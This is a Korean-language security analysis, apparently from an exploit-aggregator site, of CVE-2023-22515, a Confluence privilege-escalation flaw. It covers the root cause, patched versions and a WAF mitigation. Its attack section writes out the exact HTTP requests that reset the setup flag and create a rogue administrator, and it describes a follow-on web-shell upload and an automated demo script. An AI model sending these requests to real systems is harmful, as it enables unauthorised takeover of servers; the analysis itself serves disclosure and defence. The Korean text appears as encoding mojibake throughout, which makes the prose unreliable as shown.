Share
## https://sploitus.com/exploit?id=8C5F771B-5BCB-5AF4-9185-9EEF9EDFEFEF
# ๐Ÿ›ก๏ธ CVE-2023-22515: Confluence ๊ถŒํ•œ ์ƒ์Šน ์ทจ์•ฝ์  ์‹ฌ์ธต ๋ถ„์„

> [!IMPORTANT]
> **๊ธด๊ธ‰ ๋ณด์•ˆ ๊ฒฝ๊ณ **: ์ด ์ทจ์•ฝ์ ์€ CVSS ์Šค์ฝ”์–ด **10.0 (Critical)**์˜ ์ตœ๊ณ  ์œ„ํ—˜๋„ ์ทจ์•ฝ์ ์ž…๋‹ˆ๋‹ค. ์˜ํ–ฅ์„ ๋ฐ›๋Š” ๋ฒ„์ „์„ ์‚ฌ์šฉ ์ค‘์ธ ๊ฒฝ์šฐ ์ฆ‰๊ฐ์ ์ธ ํŒจ์น˜๊ฐ€ ํ•„์š”ํ•ฉ๋‹ˆ๋‹ค.

## 1. ๊ฐœ์š” (Overview)

**CVE-2023-22515**๋Š” Atlassian Confluence Data Center ๋ฐ Server์—์„œ ๋ฐœ๊ฒฌ๋œ ์น˜๋ช…์ ์ธ **Broken Access Control** ์ทจ์•ฝ์ ์ž…๋‹ˆ๋‹ค. ๊ณต๊ฒฉ์ž๋Š” ์ธ์ฆ ์—†์ด ์›๊ฒฉ์œผ๋กœ ์„œ๋ฒ„์˜ ์„ค์ • ์ƒํƒœ๋ฅผ ์กฐ์ž‘ํ•˜์—ฌ ๊ด€๋ฆฌ์ž ๊ณ„์ •์„ ์ƒ์„ฑํ•˜๊ณ , ์‹œ์Šคํ…œ์„ ์™„์ „ํžˆ ์žฅ์•…ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

| ํ•ญ๋ชฉ | ์ƒ์„ธ ๋‚ด์šฉ |
|------|-----------|
| **์ทจ์•ฝ์  ID** | CVE-2023-22515 |
| **์œ„ํ—˜๋„** | CRITICAL (CVSS 10.0) |
| **์˜ํ–ฅ ๋ฒ„์ „** | 8.0.0 ~ 8.5.1 (์„ธ๋ถ€ ๋ฒ„์ „ ํ™•์ธ ํ•„์š”) |
| **๊ณต๊ฒฉ ์œ ํ˜•** | ์ธ์ฆ ์šฐํšŒ ๋ฐ ๊ถŒํ•œ ์ƒ์Šน |

## 2. ๊ณต๊ฒฉ ๋ฉ”์ปค๋‹ˆ์ฆ˜ (Attack Mechanism)

์ด ์ทจ์•ฝ์ ์€ ๊ณต๊ฒฉ์ž๊ฐ€ `/server-info.action` ์—”๋“œํฌ์ธํŠธ๋ฅผ ํ†ตํ•ด `bootstrapStatusProvider.applicationConfig.setupComplete` ๊ฐ’์„ `false`๋กœ ๋ณ€๊ฒฝํ•จ์œผ๋กœ์จ ํŠธ๋ฆฌ๊ฑฐ๋ฉ๋‹ˆ๋‹ค.

### ๐Ÿ” ๊ณต๊ฒฉ ์‹œํ€€์Šค ๋‹ค์ด์–ด๊ทธ๋žจ

```mermaid
sequenceDiagram
    participant Attacker as ๐Ÿ˜ˆ ๊ณต๊ฒฉ์ž
    participant Server as ๐Ÿ–ฅ๏ธ Confluence ์„œ๋ฒ„
    participant Config as โš™๏ธ ์„ค์ • ๊ด€๋ฆฌ์ž

    Note over Attacker, Server: 1๋‹จ๊ณ„: ์„ค์ • ์ƒํƒœ ์ดˆ๊ธฐํ™” ๊ณต๊ฒฉ
    Attacker->>Server: GET /server-info.action?setupComplete=false
    Server->>Config: ๋ฉ”๋ชจ๋ฆฌ ์ƒ์˜ ์„ค์ • ์™„๋ฃŒ ํ”Œ๋ž˜๊ทธ ํ•ด์ œ
    Config-->>Server: ์ƒํƒœ ๋ณ€๊ฒฝ ์™„๋ฃŒ (์„ค์น˜ ๋ชจ๋“œ๋กœ ์ „ํ™˜)
    Server-->>Attacker: HTTP 200/302 OK

    Note over Attacker, Server: 2๋‹จ๊ณ„: ๊ด€๋ฆฌ์ž ๊ณ„์ • ์ƒ์„ฑ
    Attacker->>Server: POST /setup/setupadministrator.action(์ƒˆ๋กœ์šด ๊ด€๋ฆฌ์ž ์ •๋ณด ์ „์†ก)
    Server->>Server: ๋ณด์•ˆ ๊ฒ€์ฆ ์šฐํšŒ (์„ค์น˜ ๋ชจ๋“œ๋ผ ํ—ˆ์šฉ๋จ)
    Server-->>Attacker: ๊ณ„์ • ์ƒ์„ฑ ์„ฑ๊ณต ๋ฐ ๋กœ๊ทธ์ธ

    Note over Attacker, Server: 3๋‹จ๊ณ„: ์‹œ์Šคํ…œ ์žฅ์•… (RCE)
    Attacker->>Server: ์•…์„ฑ ํ”Œ๋Ÿฌ๊ทธ์ธ ์—…๋กœ๋“œ (Web Shell)
    Server-->>Attacker: ์›๊ฒฉ ๋ช…๋ น ์‹คํ–‰ ๊ถŒํ•œ ํš๋“
```

> [!NOTE]
> **ํ•ต์‹ฌ ์›๋ฆฌ**: ์˜๊ตฌ์ ์ธ ์„ค์ • ํŒŒ์ผ(`confluence.cfg.xml`)์„ ์ˆ˜์ •ํ•˜๋Š” ๊ฒƒ์ด ์•„๋‹ˆ๋ผ, **๋ฉ”๋ชจ๋ฆฌ ์ƒ์˜ ๋Ÿฐํƒ€์ž„ ์ƒํƒœ**๋ฅผ ๋ณ€๊ฒฝํ•˜์—ฌ ์ ‘๊ทผ ์ œ์–ด ๋กœ์ง์„ ์šฐํšŒํ•˜๋Š” ๋ฐฉ์‹์ž…๋‹ˆ๋‹ค.

## 3. ์ƒ์„ธ ๋ถ„์„ (Technical Analysis)

### ์›์ธ (Root Cause)
XWork2 ํ”„๋ ˆ์ž„์›Œํฌ์˜ ํŒŒ๋ผ๋ฏธํ„ฐ ๋ฐ”์ธ๋”ฉ ์ทจ์•ฝ์ ๊ณผ Confluence์˜ ์•ก์…˜(Action) ํด๋ž˜์Šค(`ServerInfoAction`)์—์„œ ๋ฏผ๊ฐํ•œ ์†์„ฑ(`setupComplete`)์— ๋Œ€ํ•œ ์™ธ๋ถ€ ์ž…๋ ฅ ๊ฒ€์ฆ์ด ๋ˆ„๋ฝ๋˜์–ด ๋ฐœ์ƒํ–ˆ์Šต๋‹ˆ๋‹ค.

### HTTP ์š”์ฒญ ์˜ˆ์‹œ
๊ณต๊ฒฉ์ž๋Š” ๋‹จ์ˆœํ•œ HTTP ์š”์ฒญ๋งŒ์œผ๋กœ ์„œ๋ฒ„๋ฅผ ๋ฌด๋ ฅํ™”ํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

**1. ์„ค์ • ์ดˆ๊ธฐํ™” ์š”์ฒญ:**
```http
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host: target-confluence.com
```

**2. ๊ด€๋ฆฌ์ž ์ƒ์„ฑ ์š”์ฒญ:**
```http
POST /setup/setupadministrator.action HTTP/1.1
...
username=hacker_admin&password=P@ssw0rd123...
```

## 4. ์ทจ์•ฝ์  ์žฌํ˜„ (PoC & Demo)

๋ณธ ๋ณด๊ณ ์„œ์™€ ํ•จ๊ป˜ ์ œ๊ณต๋˜๋Š” ์žฌํ˜„ ํ‚คํŠธ(`cve-2023-22515-repro`)๋ฅผ ํ†ตํ•ด ์•ˆ์ „ํ•œ Docker ํ™˜๊ฒฝ์—์„œ ์ทจ์•ฝ์ ์„ ์‹ค์Šตํ•  ์ˆ˜ ์žˆ์Šต๋‹ˆ๋‹ค.

### ๐ŸŽฅ Cinematic Demo
ํ„ฐ๋ฏธ๋„์—์„œ ์‹ค์ œ ํ•ดํ‚น ๊ณผ์ •์„ ์‹œ๊ฐ์ ์œผ๋กœ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋Š” ๋ฐ๋ชจ ์Šคํฌ๋ฆฝํŠธ๊ฐ€ ํฌํ•จ๋˜์–ด ์žˆ์Šต๋‹ˆ๋‹ค.

```bash
# ๋ฐ๋ชจ ์‹คํ–‰ ๋ช…๋ น์–ด
bash cinematic_pwn.sh
```

> [!TIP]
> ๋ฐ๋ชจ ์Šคํฌ๋ฆฝํŠธ๋Š” ์‹ค์ œ ์„œ๋ฒ„(`localhost:8090`)์— ๊ณต๊ฒฉ์„ ์ˆ˜ํ–‰ํ•˜์—ฌ ๊ด€๋ฆฌ์ž ๊ณ„์ •์„ ์ƒ์„ฑํ•˜๊ณ  ๋กœ๊ทธ์ธ๊นŒ์ง€ ์‹œ๋„ํ•˜๋Š” ์ „ ๊ณผ์ •์„ ์ž๋™ํ™”ํ•˜์—ฌ ๋ณด์—ฌ์ค๋‹ˆ๋‹ค.

## 5. ๋Œ€์‘ ๋ฐฉ์•ˆ (Mitigation)

### โœ… ์ตœ์‹  ํŒจ์น˜ ์ ์šฉ (๊ถŒ์žฅ)
๊ฐ€์žฅ ํ™•์‹คํ•œ ํ•ด๊ฒฐ์ฑ…์€ Atlassian์—์„œ ์ œ๊ณตํ•˜๋Š” ์ˆ˜์ •๋œ ๋ฒ„์ „์œผ๋กœ ์—…๊ทธ๋ ˆ์ด๋“œํ•˜๋Š” ๊ฒƒ์ž…๋‹ˆ๋‹ค.
- **8.3.3 ๋ฒ„์ „ ์ด์ƒ**
- **8.4.3 ๋ฒ„์ „ ์ด์ƒ**
- **8.5.2 ๋ฒ„์ „ ์ด์ƒ**

### โš ๏ธ ์ž„์‹œ ์™„ํ™” ์กฐ์น˜
ํŒจ์น˜๊ฐ€ ์–ด๋ ค์šด ๊ฒฝ์šฐ, ๋„คํŠธ์›Œํฌ ๋ณด์•ˆ ์žฅ๋น„(WAF, ๋กœ๋“œ๋ฐธ๋Ÿฐ์„œ ๋“ฑ)์—์„œ ๋‹ค์Œ URL ํŒจํ„ด์— ๋Œ€ํ•œ ์ ‘๊ทผ์„ ์ฐจ๋‹จํ•˜์‹ญ์‹œ์˜ค.
- `*/setup/*`

## 6. ๊ฒฐ๋ก  (Conclusion)
CVE-2023-22515๋Š” ๊ณต๊ฒฉ ๋‚œ์ด๋„๊ฐ€ ๋งค์šฐ ๋‚ฎ์œผ๋ฉด์„œ๋„ ์‹œ์Šคํ…œ ์™„์ „ ์žฅ์•…์ด ๊ฐ€๋Šฅํ•œ ์น˜๋ช…์ ์ธ ์ทจ์•ฝ์ ์ž…๋‹ˆ๋‹ค. ๋ณด์•ˆ ๋‹ด๋‹น์ž๋Š” ์ฆ‰์‹œ ํŒจ์น˜๋ฅผ ์ ์šฉํ•˜๊ณ , ์นจํ•ด ์‚ฌ๊ณ  ์—ฌ๋ถ€๋ฅผ ๋ชจ๋‹ˆํ„ฐ๋งํ•ด์•ผ ํ•ฉ๋‹ˆ๋‹ค.

---
*์ž‘์„ฑ์ผ: 2026-01-16 | ์ž‘์„ฑ์ž: Antigravity Security Analysis Team*